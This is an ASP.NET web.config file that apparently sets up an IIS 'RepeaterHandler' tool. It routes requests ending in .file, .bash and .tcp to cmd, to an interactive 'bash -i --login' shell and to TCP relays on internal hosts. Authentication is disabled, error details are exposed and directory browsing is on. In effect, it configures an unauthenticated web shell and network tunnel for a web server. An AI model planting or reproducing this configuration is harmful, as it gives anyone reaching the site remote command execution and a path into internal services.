<?xml version="1.0" encoding="UTF-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">

<appSettings>
  <add key="repeater:file" value="file:cmd" />
  <add key="repeater:bash" value="file:bash -i --login" />
  <add key="repeater:tcp"  value="tcp:192.168.1.7:5900" />
  <add key="repeater:udp"  value="tcp:localhost:23" />
</appSettings>

<connectionStrings />

<system.web>
  <httpRuntime targetFramework="4.5" />
  
  <compilation debug="true">
    <assemblies>
      <clear />
    </assemblies>
  </compilation>
  <authentication mode="None" />
  
  <customErrors mode="Off" defaultRedirect="500.htm">
    <error statusCode="403" redirect="404.html" />
    <error statusCode="404" redirect="404.html" />
  </customErrors>
</system.web>

<system.webServer>
  <handlers>
    <add name="RepeaterHandler.1" verb="*" path="*.file" type="IISTool.RepeaterHandler, IISTool" />
    <add name="RepeaterHandler.2" verb="*" path="*.bash" type="IISTool.RepeaterHandler, IISTool" />
    <add name="RepeaterHandler.3" verb="*" path="*.tcp"  type="IISTool.RepeaterHandler, IISTool" />
  </handlers>
  <directoryBrowse enabled="true" />
</system.webServer>

</configuration>
